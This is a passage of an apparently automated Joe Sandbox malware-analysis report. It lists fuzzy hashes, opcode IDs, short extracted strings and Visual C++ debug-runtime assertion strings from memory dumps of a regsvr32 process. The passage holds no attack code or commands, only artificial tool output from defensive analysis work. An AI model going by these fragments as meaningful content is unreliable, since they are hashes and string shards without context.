                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: J_H
                                • API String ID: 0-3345504573
                                • Opcode ID: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                • Instruction ID: 228b1474463df3943694e07488ce24e2c321c70e95dbe7fca5aca48057557888
                                • Opcode Fuzzy Hash: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                • Instruction Fuzzy Hash: EE71E3B1904789CBDBB9DFA4C8896DDBBB0FB48344F20421EDC5AAB251DBB45685CF01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6p
                                • API String ID: 0-4149211260
                                • Opcode ID: 2ce6c019f8e175d8f04f96ba0abbac2df009c59e7d0a66d8d52c33c4e2d2dbc2
                                • Instruction ID: 4bbd446beaef8e149afb4be24994101fb76057089ac3c5e28d57a25dd33f9813
                                • Opcode Fuzzy Hash: 2ce6c019f8e175d8f04f96ba0abbac2df009c59e7d0a66d8d52c33c4e2d2dbc2
                                • Instruction Fuzzy Hash: 5D512670D0470E8FDBA5CFA4C4863EEBBF0FB58344F208519E155B6251C7789A498BD6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: o-b
                                • API String ID: 0-1062997908
                                • Opcode ID: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                • Instruction ID: 42124e7df8dcd8895505725edc86312d8ed31e4959f5f45477de907a66349d68
                                • Opcode Fuzzy Hash: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                • Instruction Fuzzy Hash: 5951177050064D8BDB94DF58C48A6DE3BE0FB28398F254219FC4AA6250D7789699CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >(O
                                • API String ID: 0-1787487011
                                • Opcode ID: b44782859c9866ecf0a367f2980fc160796e99ead2e04d39a5c7d0e6a088d4a1
                                • Instruction ID: 047403745ffdf525a43130cb5f0cbada7355141308e198c8a6f422d75d1d2ed5
                                • Opcode Fuzzy Hash: b44782859c9866ecf0a367f2980fc160796e99ead2e04d39a5c7d0e6a088d4a1
                                • Instruction Fuzzy Hash: FB51D0B090078A8BCF4CDF64C8964EE7BB1FB48344F418A1DE966A6350D3B49665CFD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8:*
                                • API String ID: 0-724269717
                                • Opcode ID: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                • Instruction ID: 711009871b2250b35f00fe0553413368f045348530dbac453829dc2cbdd56c12
                                • Opcode Fuzzy Hash: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                • Instruction Fuzzy Hash: DE519FB491074A8FCF48CF68D48A4DEBFB0FB68398F604519EC56AA250D37496A4CFD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: rX
                                • API String ID: 0-981687150
                                • Opcode ID: 72326b85271c7a937057e165988be4f12753e05fcac8eb4b8ea4e21389b64c69
                                • Instruction ID: b6d69565f821f61997a80366e3bba675c41573294b632c1fc230c031640afc4a
                                • Opcode Fuzzy Hash: 72326b85271c7a937057e165988be4f12753e05fcac8eb4b8ea4e21389b64c69
                                • Instruction Fuzzy Hash: 4151AFB090034E9FCB88CF64D48A5DE7FF0FB68398F204619E856A6250D7B496A5CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Mf_
                                • API String ID: 0-1332758469
                                • Opcode ID: fb88f28924fad9aaa6151cff677ca0e0efdf4f904b7a048c95071875f4937966
                                • Instruction ID: 588ebf95624ee4adfb38f08f1f8e1a2e631849e2b9196c961bccb52f3d8eb30d
                                • Opcode Fuzzy Hash: fb88f28924fad9aaa6151cff677ca0e0efdf4f904b7a048c95071875f4937966
                                • Instruction Fuzzy Hash: 72413A7051034E8BDB49DF24C88A6DE3FA0FB28388F254619FC4AA6250D774DA99CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X
                                • API String ID: 0-1684620495
                                • Opcode ID: 95d6dfd1a906a0706b046fd694ee3460552bea9bfe9cb5e2a40ac0cd4b690da8
                                • Instruction ID: f9643209bdbdb1888c2e59a9774da8228396ec72f530c9748c2220c9be6d5877
                                • Opcode Fuzzy Hash: 95d6dfd1a906a0706b046fd694ee3460552bea9bfe9cb5e2a40ac0cd4b690da8
                                • Instruction Fuzzy Hash: BC41B2B050C3858BC368DF69D49A51BFFF0FB8A344F104A1DF68686660D7B6D985CB06
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *ZP
                                • API String ID: 0-3785686542
                                • Opcode ID: 124ec41d44a3523d05a66609c609173a78c4b3624f4a4e6496b4e9e6556fc9cc
                                • Instruction ID: cd700ac0e72fdea100a6c678007ea8a5747de393b09cc95ae15ed8a735d2c9a6
                                • Opcode Fuzzy Hash: 124ec41d44a3523d05a66609c609173a78c4b3624f4a4e6496b4e9e6556fc9cc
                                • Instruction Fuzzy Hash: C351A3B490038EDFCB89CF64D88A5CE7BB0FB14358F104A19F826A6260D7B49665CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: m9
                                • API String ID: 0-3356931199
                                • Opcode ID: 59db1ee33f63e0a2717973542dec2f5b5e1c1c898ff6bc1b3de0a09d2022d082
                                • Instruction ID: d52339509a2a8a66acc38e501e73e88f1da459d23edb33c529fdb618239225c9
                                • Opcode Fuzzy Hash: 59db1ee33f63e0a2717973542dec2f5b5e1c1c898ff6bc1b3de0a09d2022d082
                                • Instruction Fuzzy Hash: AC41DFB091074E8BDB48CF68C48A5DE7FF0FB58388F24821DE816A6250D3B496A4CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 4pI
                                • API String ID: 0-4229698716
                                • Opcode ID: 2de104f479e2b2f02d24493f8855e4bc5dcdc9c63e6a51756a92895ab6f7f3eb
                                • Instruction ID: 0770ca01e568b3f0bfe5184ab77212d0ab800e579d58ef6f76929ab8cb5ebb0d
                                • Opcode Fuzzy Hash: 2de104f479e2b2f02d24493f8855e4bc5dcdc9c63e6a51756a92895ab6f7f3eb
                                • Instruction Fuzzy Hash: 2741F4B190074E8BCF48CFA8C89A5DE7FB0FB58358F10561DE826A6250D3B49658CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: T7
                                • API String ID: 0-2187045315
                                • Opcode ID: 5b373cdcbe2aa1956c24a8ef4c3b2010382917b3ef4417ae897a4905ea2e7e5d
                                • Instruction ID: e445a35d468e15d444dcf9e81ad6d1cbfbebd9662ebae466ae50992912f39bd9
                                • Opcode Fuzzy Hash: 5b373cdcbe2aa1956c24a8ef4c3b2010382917b3ef4417ae897a4905ea2e7e5d
                                • Instruction Fuzzy Hash: 6B41E3B191074A8BCF48CF68C48A4DE7FB0FF68398F214609E856A6250D3B496A5CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Y[
                                • API String ID: 0-1945238269
                                • Opcode ID: 31c1f4254bc290cabebbeaadf273c7758becd057e90036f86d7834daa6438d30
                                • Instruction ID: 277041adf1a083522e20f1ff56a0db14356653c4c70dd43ccf4c86f47916e8c3
                                • Opcode Fuzzy Hash: 31c1f4254bc290cabebbeaadf273c7758becd057e90036f86d7834daa6438d30
                                • Instruction Fuzzy Hash: C941E67091038E8FCB48DF68C88A5DE7BB1FB58358F10461DEC6AAB250D3B49664CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: [
                                • API String ID: 0-784033777
                                • Opcode ID: 593e2affadbd7d43363044155888d79a97a338ed63d972069ddab33477027861
                                • Instruction ID: 430e1a122fe0b20a7e1e6f195b5c5d6ab4e3c741a825a8fe397d5d7cdac5a180
                                • Opcode Fuzzy Hash: 593e2affadbd7d43363044155888d79a97a338ed63d972069ddab33477027861
                                • Instruction Fuzzy Hash: 2841E4B090074E8BCB48CF64C89A4EE7FF1FB68358F11461DE856A6250D3B496A5CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 9 m
                                • API String ID: 0-1920745034
                                • Opcode ID: 403251bbe0303adcdb9fc718cab8a153fac6736b8b0f21ecfcc0465734d374f6
                                • Instruction ID: 3be0e43e89224af25a3a96d245761afcbfad2e5132df1735d4859c98edb6e384
                                • Opcode Fuzzy Hash: 403251bbe0303adcdb9fc718cab8a153fac6736b8b0f21ecfcc0465734d374f6
                                • Instruction Fuzzy Hash: 5D41A6B180038ECFCB48CF68C88A5DE7FB1FB58358F114A19F869A6210D7B49665CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: wo0
                                • API String ID: 0-1782833155
                                • Opcode ID: 915272897a82389ccaff6fb74a1b6d3f763f551119c92165f64424d72f92453c
                                • Instruction ID: 9062cfcdbd96f40b118b25d613ee2554a2eb62b456f013d12e1abcba11dd4c76
                                • Opcode Fuzzy Hash: 915272897a82389ccaff6fb74a1b6d3f763f551119c92165f64424d72f92453c
                                • Instruction Fuzzy Hash: AD4104B090034E8BCB48CF68C4865DE7FB0FB48358F11861DE85AAA250D7749664CFC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0FT
                                • API String ID: 0-3306264968
                                • Opcode ID: 221a7c3e7820f489f33ab0bfd813c90db956588b7e3f278aa32cbc5897504973
                                • Instruction ID: 6bc0069c9e8fc616ccef226ca938112ebcbb35ca2f33a2ab28ad344b092e513b
                                • Opcode Fuzzy Hash: 221a7c3e7820f489f33ab0bfd813c90db956588b7e3f278aa32cbc5897504973
                                • Instruction Fuzzy Hash: 30419FB090078E8FCB49CF64C88A5DE7BB0FB18358F104A19E866A7250D7B8D665CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: [Mh<
                                • API String ID: 0-3342980100
                                • Opcode ID: 8db4eb38f9ab2c3bc7d36487ff8b598b8cd98b11ddd9dbc7aed51384deea61bf
                                • Instruction ID: 3dfa530075d16dbdc0ab74c4fd592fdc9016efe2b3d8749faa49a3b984689735
                                • Opcode Fuzzy Hash: 8db4eb38f9ab2c3bc7d36487ff8b598b8cd98b11ddd9dbc7aed51384deea61bf
                                • Instruction Fuzzy Hash: 3D41B4B090034E8BDB88DF68C88A4DE7FF0FB58398F104619E855A6250D37496A4CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: [*y
                                • API String ID: 0-3642367475
                                • Opcode ID: f920a7f17afa669f85dd4fa2bbc3f052cb99f05070bc78a3fd5f717c453881c3
                                • Instruction ID: f49b88a051f724710f0cfdc48a2fab0be3c7391659c99e254e23c0044fb95fb4
                                • Opcode Fuzzy Hash: f920a7f17afa669f85dd4fa2bbc3f052cb99f05070bc78a3fd5f717c453881c3
                                • Instruction Fuzzy Hash: 9F318C746183858B8748DF28D45641ABBE1FBCC308F405B2DF8CAAB291D7789641CB8B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: dk
                                • API String ID: 0-2586313868
                                • Opcode ID: 8a4805f75226fc2840e2c7b063b7b1e39b1ba6f4f5ce1306a123ad924c24cf9d
                                • Instruction ID: bd21a50a93d9ce141822b95cdb4ee263f008649e2ad7f0911c2a62c734e6813a
                                • Opcode Fuzzy Hash: 8a4805f75226fc2840e2c7b063b7b1e39b1ba6f4f5ce1306a123ad924c24cf9d
                                • Instruction Fuzzy Hash: 8631E4B0508B808BC75CDF28C49A51BBBF1FBC6354F504A1CF686863A0DBB6D849CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: m?@
                                • API String ID: 0-4017832957
                                • Opcode ID: 92bb4875fae3dfbb536cc4a594f9b8f02b4b9fef725d60d218a6fcb850c1db5e
                                • Instruction ID: 763f89865c62d32814b91696e152b9bff8d9fc03c4acc356d14baff2dc9750fc
                                • Opcode Fuzzy Hash: 92bb4875fae3dfbb536cc4a594f9b8f02b4b9fef725d60d218a6fcb850c1db5e
                                • Instruction Fuzzy Hash: B231BF752187858BC749DF28C04A41ABBE1FB8D30CF504B2DF4CAA6350D778D616CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: MR
                                • API String ID: 0-1985102067
                                • Opcode ID: c3045b5f67f41fb122cd1cd8de18bcca47d48181f2768d112050a64545bdb3cc
                                • Instruction ID: 3dc758c2b0da019c4ef40f7354f1f5afd613488c2e2992af3e697213e5bda16f
                                • Opcode Fuzzy Hash: c3045b5f67f41fb122cd1cd8de18bcca47d48181f2768d112050a64545bdb3cc
                                • Instruction Fuzzy Hash: 9F215CB05187808BD749DF28C55941EBBE1BB9D30CF804B2DF4CAAA251D778DA05CF4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: h{9
                                • API String ID: 0-709585855
                                • Opcode ID: 158519ec253ad62ee934b2a1f06c22473a728e5d40c1cbc8d8e2591bd6c1f9a1
                                • Instruction ID: 28d7748f9e23597285172eede27c795ca80d4d45ffdf147c2eecc812d7a7424c
                                • Opcode Fuzzy Hash: 158519ec253ad62ee934b2a1f06c22473a728e5d40c1cbc8d8e2591bd6c1f9a1
                                • Instruction Fuzzy Hash: A22180B152D785AFC788DF28C59991ABBE0FB98308F806E1DF9868A250D374D545CB43
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: =WQ
                                • API String ID: 0-979633440
                                • Opcode ID: beecb343f63eb420ad30c3b234d671f41fcffe89ae230601040905a52fbe6922
                                • Instruction ID: f1c989dca105177ef840caf4573424004201902730bc760d24db79eb0592445f
                                • Opcode Fuzzy Hash: beecb343f63eb420ad30c3b234d671f41fcffe89ae230601040905a52fbe6922
                                • Instruction Fuzzy Hash: 2C2146746187848B8749DF28C44A51ABBE1BB8D30CF804B1DF8CAAB250D7789A05CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d58b218a6fad6bc529337baac5d9ed9f8b1cbf9dbb0a3b92ec118c03c99fb86
                                • Instruction ID: c77f93fcecba916d7a728a8c6eb3e78c0c4fd01b54dcd62d4346d4040ea08623
                                • Opcode Fuzzy Hash: 0d58b218a6fad6bc529337baac5d9ed9f8b1cbf9dbb0a3b92ec118c03c99fb86
                                • Instruction Fuzzy Hash: 28E11E7090470D8FCF59DF68D446AEE7BB6FB48344F504129EC4EAB251DB74AA08CB86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c8b8be56366865ecfdde9c8b2ec8895e219799960cb59c8d6409a7e773344f9
                                • Instruction ID: 37013b96f87cdafdf9e9430ef7fa874701b46d6ad591addafa58d16b7588ecf0
                                • Opcode Fuzzy Hash: 1c8b8be56366865ecfdde9c8b2ec8895e219799960cb59c8d6409a7e773344f9
                                • Instruction Fuzzy Hash: 7E811370D047098FDB89CFA8D4856EEBBF1FB48314F14812EE846B6250CB788A49CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 636ed3c89b38e63114f2d2672b542ea9429d7597145989221425ac881483aa9e
                                • Instruction ID: 9c3afdfbfdf497047419e96e23ac648a32a0c35cf7c10b77ff2162508d5b9c58
                                • Opcode Fuzzy Hash: 636ed3c89b38e63114f2d2672b542ea9429d7597145989221425ac881483aa9e
                                • Instruction Fuzzy Hash: 68715B70A0460D8FCFA9DF64D0857EE77F2FB48348F109169E856972A2DB74DA18CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                • API String ID: 242677333-579931786

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$FileModuleName
                                • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                • API String ID: 1949418964-1840610800

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$_invalid_parameter
                                • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                • API String ID: 2356156361-2279852085

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: FileHandleWrite
